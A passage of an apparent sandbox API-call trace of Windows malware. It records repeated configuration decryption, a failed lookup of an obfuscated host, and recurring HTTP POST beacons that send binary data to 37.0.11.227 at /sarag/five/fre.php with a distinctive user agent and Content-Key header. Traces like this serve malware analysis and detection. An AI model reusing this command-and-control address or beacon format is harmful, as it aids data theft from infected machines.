(HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0176.571] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.572] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0176.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.574] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0176.603] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.603] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0176.604] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.604] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0176.604] GetProcessHeap () returned 0x690000 [0176.605] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0176.605] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0176.605] GetProcessHeap () returned 0x690000 [0176.605] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0176.605] GetProcessHeap () returned 0x690000 [0176.606] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0176.606] GetProcessHeap () returned 0x690000 [0176.606] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0176.606] GetProcessHeap () returned 0x690000 [0176.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0176.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.607] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0176.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.614] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0176.623] GetProcessHeap () returned 0x690000 [0176.623] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0176.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.625] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0176.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.628] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0176.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.631] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0176.631] GetProcessHeap () returned 0x690000 [0176.631] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0176.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.634] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0176.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.636] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0176.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.638] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0176.638] GetProcessHeap () returned 0x690000 [0176.638] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0176.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.639] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0176.640] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.641] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0176.641] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.641] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0176.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.642] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0176.642] GetProcessHeap () returned 0x690000 [0176.642] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0176.642] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a98e8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae940*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0176.643] GetProcessHeap () returned 0x690000 [0176.643] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab490 [0176.643] socket (af=2, type=1, protocol=6) returned 0x2a0 [0176.643] connect (s=0x2a0, name=0x6ae940*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0176.681] FreeAddrInfoW (pAddrInfo=0x6a98e8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae940*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0176.681] GetProcessHeap () returned 0x690000 [0176.681] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0176.681] GetProcessHeap () returned 0x690000 [0176.681] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0176.683] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0176.692] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0176.692] GetProcessHeap () returned 0x690000 [0176.692] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a91a8 [0176.692] GetProcessHeap () returned 0x690000 [0176.692] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0176.692] GetProcessHeap () returned 0x690000 [0176.692] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0176.692] GetProcessHeap () returned 0x690000 [0176.692] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0176.693] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0176.694] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0176.694] GetProcessHeap () returned 0x690000 [0176.694] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6a9268 [0176.694] GetProcessHeap () returned 0x690000 [0176.694] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0176.694] send (s=0x2a0, buf=0x6a9268*, len=242, flags=0) returned 242 [0176.695] send (s=0x2a0, buf=0x6aba40*, len=159, flags=0) returned 159 [0176.695] GetProcessHeap () returned 0x690000 [0176.695] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6ad790 [0176.695] recv (in: s=0x2a0, buf=0x6ad790, len=4048, flags=0 | out: buf=0x6ad790*) returned 204 [0176.780] GetProcessHeap () returned 0x690000 [0176.781] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9268 | out: hHeap=0x690000) returned 1 [0176.784] GetProcessHeap () returned 0x690000 [0176.784] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0176.784] GetProcessHeap () returned 0x690000 [0176.785] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a91a8 | out: hHeap=0x690000) returned 1 [0176.785] GetProcessHeap () returned 0x690000 [0176.785] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0176.785] closesocket (s=0x2a0) returned 0 [0176.786] GetProcessHeap () returned 0x690000 [0176.786] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab490 | out: hHeap=0x690000) returned 1 [0176.786] GetProcessHeap () returned 0x690000 [0176.787] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0176.787] GetProcessHeap () returned 0x690000 [0176.787] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0176.787] GetProcessHeap () returned 0x690000 [0176.787] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0176.788] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6ad790, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x898) returned 0x2a0 [0176.798] Sleep (dwMilliseconds=0xea60) [0176.799] GetProcessHeap () returned 0x690000 [0176.799] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0176.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.801] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0176.812] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.813] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0176.821] GetProcessHeap () returned 0x690000 [0176.821] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0176.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.828] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0176.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.829] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0176.829] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.830] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0176.830] GetProcessHeap () returned 0x690000 [0176.830] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0176.831] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.831] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0176.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.832] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0176.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.833] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0176.833] GetProcessHeap () returned 0x690000 [0176.833] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0176.834] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.834] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0176.835] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.835] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0176.836] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.836] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0176.837] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.837] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0176.837] GetProcessHeap () returned 0x690000 [0176.837] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0176.837] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0176.838] GetProcessHeap () returned 0x690000 [0176.838] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0176.838] GetProcessHeap () returned 0x690000 [0176.838] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0176.839] GetProcessHeap () returned 0x690000 [0176.839] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0176.839] GetProcessHeap () returned 0x690000 [0176.839] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0176.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.840] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0176.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.848] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0176.854] GetProcessHeap () returned 0x690000 [0176.854] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0176.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.855] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0176.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.856] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0176.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.857] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0176.857] GetProcessHeap () returned 0x690000 [0176.857] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0176.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.859] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0176.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.860] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0176.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.861] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0176.861] GetProcessHeap () returned 0x690000 [0176.861] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0176.862] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.862] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0176.862] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.863] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0176.863] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.864] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0176.864] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.864] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0176.864] GetProcessHeap () returned 0x690000 [0176.865] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0176.865] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9b18*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0176.865] GetProcessHeap () returned 0x690000 [0176.865] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0176.865] socket (af=2, type=1, protocol=6) returned 0x2a4 [0176.865] connect (s=0x2a4, name=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0176.893] FreeAddrInfoW (pAddrInfo=0x6a9b18*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0176.893] GetProcessHeap () returned 0x690000 [0176.893] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0176.893] GetProcessHeap () returned 0x690000 [0176.893] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0176.894] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0176.894] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0176.894] GetProcessHeap () returned 0x690000 [0176.894] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a92a0 [0176.894] GetProcessHeap () returned 0x690000 [0176.895] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0176.895] GetProcessHeap () returned 0x690000 [0176.895] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0176.895] GetProcessHeap () returned 0x690000 [0176.895] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0176.896] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0176.897] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0176.897] GetProcessHeap () returned 0x690000 [0176.897] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0176.897] GetProcessHeap () returned 0x690000 [0176.897] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0176.897] send (s=0x2a4, buf=0x6abd08*, len=242, flags=0) returned 242 [0176.898] send (s=0x2a4, buf=0x6aba40*, len=159, flags=0) returned 159 [0176.898] GetProcessHeap () returned 0x690000 [0176.898] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6ad790 [0176.898] recv (in: s=0x2a4, buf=0x6ad790, len=4048, flags=0 | out: buf=0x6ad790*) returned 204 [0176.978] GetProcessHeap () returned 0x690000 [0176.979] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0176.981] GetProcessHeap () returned 0x690000 [0176.981] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0176.981] GetProcessHeap () returned 0x690000 [0176.981] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a92a0 | out: hHeap=0x690000) returned 1 [0176.981] GetProcessHeap () returned 0x690000 [0176.982] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0176.982] closesocket (s=0x2a4) returned 0 [0176.983] GetProcessHeap () returned 0x690000 [0176.983] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0176.983] GetProcessHeap () returned 0x690000 [0176.983] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0176.983] GetProcessHeap () returned 0x690000 [0176.983] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0176.983] GetProcessHeap () returned 0x690000 [0176.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0176.984] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6ad790, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x8f0) returned 0x2a4 [0176.986] Sleep (dwMilliseconds=0xea60) [0176.987] GetProcessHeap () returned 0x690000 [0176.987] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0176.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.988] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0176.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.997] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0177.007] GetProcessHeap () returned 0x690000 [0177.007] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0177.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.008] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0177.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.010] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0177.011] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.012] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0177.012] GetProcessHeap () returned 0x690000 [0177.012] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0177.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.014] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0177.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.019] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0177.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0177.020] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0177.020] GetProcessHeap () returned 0x690000 [0177.020] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0177.021] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.021] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0177.022] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.022] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0177.023] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.024] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0177.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0177.025] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0177.025] GetProcessHeap () returned 